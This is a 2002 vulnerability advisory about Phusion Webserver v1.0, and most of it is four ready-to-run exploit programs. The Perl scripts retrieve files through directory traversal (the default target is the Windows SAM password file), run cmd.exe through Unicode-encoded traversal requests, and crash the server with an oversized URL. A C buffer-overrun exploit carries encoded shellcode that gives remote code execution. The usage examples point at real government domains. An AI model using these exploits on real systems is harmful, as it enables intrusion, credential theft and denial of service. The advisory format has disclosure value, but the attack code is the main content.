19th Feb 2002 [SBWID-5111]
COMMAND
Phusion Webserver Directory Traversal, DoS Vulnerabilities and
BufferOverrun
SYSTEMS AFFECTED
Version: v1.0
PROBLEM
Alex Hernandez found that Phusion Webserver for Windows 9x/NT/2000
contains 3 remote vulnerabilities which allow users to see and retrieve
any file on the server.
Phusion Webserver Server is an Webserver for Windows 9x/NT/2000
(http://www.bbshareware.com/phusion/). A bug allows any user to change
to any directory and see files to PATH also GET files remotely also
exist a BufferOverrun you can run abitrary code inside.
Directory traversal
===================
The security vulnerability is possible by using a specially crafted URL
composed of triple dot \".../\" directory traversal sequences, with
HTTP encoded character representations substituted for \"/\" and
\"\\\".
Example:
http://www.example.com/.../.../.../.../test.txt
sh-2.04# nc -vvn 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (?) open
GET /.../.../.../.../test.txt HTTP /1.0
DoS
===
Server crashes after sending a very long URL:
http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA
Exploits Directory traversal, DoS, buffer overrun
=================================================
------oOo------------------------
Exploit Code GET files Phusion-GET.pl
------oOo------------------------
#!/usr/bin/perl
#
# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN
#
# Simple script to get files on server.
#
# Maybe u need this line for windows:
# #! c:\\perl\\bin\\perl.exe
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion-GET.pl <And read the Intructions>
#
#
print(\"\\nPhusion Webserver v1.0 GET Files exploit (c)2002.\\n\");
print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");
print <<\"EOT\";
Please type the address remote webserver, example: www.whitehouse.gov
[Default remote Webserver is \"127.0.0.1\"`]:
EOT
$host = <>;
print <<\"EOT\";
Please type only in the directory where the file is located you want to
download,
example: /winnt/repair/
[default directory is \"/winnt/repair/\"] :#For IIS 4-5
EOT
$directory = <> || \"/winnt/repair/\";
print <<\"EOT\";
Please type in the filename you want download example: sam._
[default file is \"sam._\"] :
EOT
$file = <> || \"sam._\";
{
#Maybe u to change this line depending of PATH installation.
system(\"explorer.exe\", \"http://$host:80/../../..$directory$file\");
}
print <<\"EOT\";
HAVE Fun!. ;-)
EOT
------oOo------------------------
Exploit Code Traversal Phusion_exp.pl
------oOo------------------------
#!/usr/bin/perl
#
# Simple script to identify if the host is vulnerable!,
#
# This does 15 different checks based IIS 4-5. Have Fun!
#
# Phusion Webserver v1.0 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion_exp.pl <Hosts>:<Port>
#
# Example:
#
# perl -x Phusion_exp.pl www.whitehouse.com:80
# Trying.....................
#
# <THIS HOST IS VULNERABLE> :-)
# Check the previous notes to execute bugs.
#
#
use Socket;
if ($#ARGV<0) {die \"
\\nPhusion Webserver v1.0 traversal exploit(c)2002.
Alex Hernandez al3xhernandez\\@ureach.com\\n
Usage: perl -x $0 www.whitehouse.com:80 {OR}\\n
[if the host is not using a proxy]\\n
Usage: perl -x $0 127.0.0.1:80\\n\\n\";}
($host,$port)=split(/:/,@ARGV[0]);
print \"Trying.....................\\n\";
$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw(\"GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 2
my @results=sendraw(\"GET
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 3
my @results=sendraw(\"GET
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 4
my @results=sendraw(\"GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 5
my @results=sendraw(\"GET
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 6
my @results=sendraw(\"GET
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 7
my @results=sendraw(\"GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 8
my @results=sendraw(\"GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 9
my @results=sendraw(\"GET
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 10
my @results=sendraw(\"GET
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 11
my @results=sendraw(\"GET
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 12
my @results=sendraw(\"GET
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 13
my @results=sendraw(\"GET
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 14
my @results=sendraw(\"GET
/msadc/..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../
winnt/system32/cmd.exe\\?/c\\+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 15
my @results=sendraw(\"GET
/.../.../.../.../winnt/system32/cmd.exe\\?/c\\+dir
HTTP/1.0\\r\\n\\r\\n\");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
#------------------------------
if ($flag==1){print \"<THIS HOST IS VULNERABLE> :-)\\n
Check the previous notes to execute bugs\\n\";}
else {print \"<THIS HOST IS NOT VULNERABLE> :-( \\n
Check manually on browser...\\n\";}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) ||
die(\"Socket problems\\n\");
if(connect(S,pack \"SnA4x8\",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die(\"Can\'t connect check the port or address...\\n\"); }
}
------oOo-------------
Exploit Code DoS Phusion_DoS.pl
------oOo-------------
#!/usr/bin/perl
#
# Simple script to send a long \'A^s\' command to the server,
# resulting in the server crashing.
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion_DoS.pl -s <server>
#
# Example:
#
# perl -x Phusion_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print(\"\\nPhusion Webserver v1.0 DoS exploit (c)2002.\\n\");
print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");
getopts(\'s:\', \\%args);
if(!defined($args{s})){&usage;}
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);
$def = \"A\";
$num = \"3000\";
$data .= $def x $num;
$serv = $args{s};
$port = 80;
$buf = \"GET /cgi-bin/$data /HTTP/1.0\\r\\n\\r\\n\";
$in_addr = (gethostbyname($serv))[4] || die(\"Error: $!\\n\");
$paddr = sockaddr_in($port, $in_addr) || die (\"Error: $!\\n\");
$proto = getprotobyname(\'tcp\') || die(\"Error: $!\\n\");
socket(S, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\");
connect(S, $paddr) ||die (\"Error: $!\");
select(S); $| = 1; select(STDOUT);
print S \"$buf\";
print(\"\\nCrash was successful !\\n\\n\");
sub usage {die(\"\\n\\nUsage: perl -x $0 -s <server>\\n\\n\");}
------oOo------------------------
Exploit Code BufferOverrun Phusion-ovrun.c
------oOo------------------------
/** Phusion-Overun.c
** -Remote exploit for Phusion Webserver v1.0 for WinNT.
**
** Phusion Webserver v1.0 exploit gets remote servers\'s full control.
** When you attacks a vulnerable server you can run abitrary code
** inside.
**
** Phusion Webserver v1.0 proof-of-concept exploit.
** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
**
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
** G.Maggiotti & H.Oliveira.
**
**
** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c
**
** Usage: ./Phusion-ovrun <hostname>
**
**
**
**
**/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
#define _PORT 80
#define _X 10000
char runcrash[] =
\"GET /\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x81\\xc7\\xc8\\x10\\x10\\x10\\x81\\xef\\x10\"
\"\\x10\\x10\\x10\\x57\\x5e\\x33\\xc0\\x66\\xb8\\x31\\x02\\x90\\x90\\x50\"
\"\\x59\\xac\\x34\\x99\\xaa\\xe2\\xfa\\x71\\x99\\x99\\x99\\x99\\xc4\\x18\"
\"\\x74\\xb1\\x89\\xd9\\x99\\xf3\\x99\\xf1\\x19\\x99\\x99\\x99\\xf3\\x9b\"
\"\\xf3\\x99\\xf3\\x99\\xf1\\x99\\x99\\x99\\xd9\\x14\\x2c\\xac\\x8b\\xd9\"
\"\\x99\\xcf\\xf1\\x19\\x02\\xd4\\x99\\xc3\\x66\\x8b\\xc9\\xc2\\xf3\\x99\"
\"\\x14\\x24\\x3a\\x89\\xd9\\x99\\xaa\\x59\\x32\\x14\\x2c\\x3a\\x89\\xd9\"
\"\\x99\\xcf\\xf1\\xd3\\x98\\x99\\x99\\x09\\x14\\x2c\\x72\\x89\\xd9\\x99\"
\"\\xcf\\xca\\xf1\\x49\\x05\\xd4\\x99\\xc3\\x66\\x8b\\xca\\xf1\\x05\\x02\"
\"\\xd4\\x99\\xc3\\x66\\x8b\\xf1\\xa9\\xd4\\xde\\x99\\xc6\\x14\\x2c\\x3e\"
\"\\x89\\xd9\\x99\\xf3\\xdd\\x09\\x09\\x09\\x09\\xc0\\x35\\x33\\x7b\\x65\"
\"\\xf3\\x99\\x23\\x31\\x02\\xd4\\x99\\x66\\x8b\\x99\\x99\\x99\\x99\\xca\"
\"\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xf1\\xf8\\xfa\\xf2\\xfc\\xfd\\xb7\\xa5\"
\"\\xb6\\xf1\\xab\\xa7\\xf1\\xed\\xed\\xe9\\xa3\\xb6\\xb6\\xee\\xee\\xee\"
\"\\xb7\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\\xfc\\xb7\\xf6\\xeb\\xfe\\xb9\"
\"\\xb9\\xca\\xe9\\xf5\\xf6\\xf0\\xed\\xb9\\xfa\\xf6\\xfd\\xfc\\xfd\\xb9\"
\"\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb9\\xe4\\xa3\\xb0\\xa5\\xf1\\xed\"
\"\\xf4\\xf5\\xa7\\xa5\\xf1\\xfc\\xf8\\xfd\\xa7\\xa5\\xed\\xf0\\xed\\xf5\"
\"\\xfc\\xa7\\xca\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xf1\\xf8\\xfa\\xf2\\xfc\"
\"\\xfd\\xb7\\xa5\\xb6\\xed\\xf0\\xed\\xf5\\xfc\\xa7\\xa5\\xb6\\xf1\\xfc\"
\"\\xf8\\xfd\\xa7\\xa5\\xfb\\xf6\\xfd\\xe0\\xa7\\xa5\\xfa\\xfc\\xf7\\xed\"
\"\\xfc\\xeb\\xa7\\xd1\\xfc\\xf5\\xf5\\xf6\\xb7\\xb9\\xc0\\xf6\\xec\\xb9\"
\"\\xf8\\xeb\\xfc\\xb9\\xeb\\xec\\xf7\\xf7\\xf0\\xf7\\xfe\\xb9\\xf8\\xb9\"
\"\\xc3\\xdb\\xca\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xc9\\xcb\\xd6\\xea\\xb9\"
\"\\xfb\\xec\\xfe\\xfe\\xe0\\xb9\\xef\\xfc\\xeb\\xea\\xf0\\xf6\\xf7\\xb9\"
\"\\xf8\\xf7\\xfd\\xb9\\xe0\\xf6\\xec\\xb9\\xf1\\xf8\\xef\\xfc\\xb9\\xfb\"
\"\\xfc\\xfc\\xf7\\xb9\\xf8\\xfb\\xec\\xea\\xfc\\xfd\\xb7\\xa5\\xe9\\xa7\"
\"\\xd4\\xf6\\xeb\\xfc\\xb9\\xf0\\xf7\\xff\\xf6\\xeb\\xf4\\xf8\\xed\\xf0\"
\"\\xf6\\xf7\\xb9\\xfa\\xf8\\xf7\\xb9\\xfb\\xfc\\xb9\\xfd\\xf6\\xee\\xf7\"
\"\\xf5\\xf6\\xf8\\xfd\\xb9\\xff\\xeb\\xf6\\xf4\\xb9\\xf1\\xed\\xed\\xe9\"
\"\\xa3\\xb6\\xb6\\xee\\xee\\xee\\xb7\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\"
\"\\xfc\\xb7\\xf6\\xeb\\xfe\\xb9\\xf6\\xeb\\xb9\\xf1\\xed\\xed\\xe9\\xa3\"
\"\\xb6\\xb6\\xf4\\xf8\\xeb\\xfc\\xf8\\xea\\xef\\xf0\\xef\\xf8\\xea\\xb7\"
\"\\xfa\\xf3\\xfb\\xb7\\xf7\\xfc\\xed\\xa5\\xe9\\xa7\\xeb\\xfc\\xfe\\xf8\"
\"\\xeb\\xfd\\xea\\xb9\\xed\\xf6\\xb9\\xdd\\xfc\\xfc\\xe9\\xc3\\xf6\\xf7\"
\"\\xfc\\xb9\\xfa\\xeb\\xfc\\xee\\xb9\\xb1\\xcd\\xf1\\xfc\\xce\\xf0\\xe3\"
\"\\xf8\\xeb\\xfd\\xb5\\xb9\\xd8\\xf7\\xec\\xea\\xf2\\xf8\\xb9\\xf8\\xf7\"
\"\\xfd\\xb9\\xd7\\xfc\\xf4\\xf6\\xb0\\xa5\\xe9\\xa7\\xda\\xf6\\xfd\\xfc\"
\"\\xfd\\xb9\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb7\\xa5\\xb6\\xfa\\xfc\"
\"\\xf7\\xed\\xfc\\xeb\\xa7\\xa5\\xb6\\xfb\\xf6\\xfd\\xe0\\xa7\\xa5\\xb6\"
\"\\xf1\\xed\\xf4\\xf5\\xa7\\xb7\\xc5\\xf1\\xed\\xf4\\xf5\\xc5\\xca\\xfc\"
\"\\xeb\\xef\\xfc\\xeb\\xd8\\xfb\\xec\\xea\\xfc\\xfd\\xfb\\xe0\\xf0\\xc3\"
\"\\xf8\\xf7\\xb7\\xf1\\xed\\xf4\\xf5\\x99\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\xac\\xe0\\xe3\\x01\";
int sock;
struct sockaddr_in sock_a;
struct hostent *host;
int main (int argc, char *argv[]) {
printf(\"\\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\\n\");
printf(\"Alex Hernandez al3xhernandez@ureach.com\\n\\n\");
if(argc < 2) {
fprintf(stderr, \"Error : Usage: %s <hostname> \\n\", argv[0]);
exit(0);
}
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
perror(\"gethostbyname\");
exit(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror(\"create socket\");
exit(-1);
}
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(_PORT);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
perror(\"create connect\");
exit(-1);
}
fflush(stdout);
write(sock,runcrash,_X);
write(sock,\"\\n\\n\", 2);
printf(\"done.\\n\\n\");
}
SOLUTION
Nothing yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
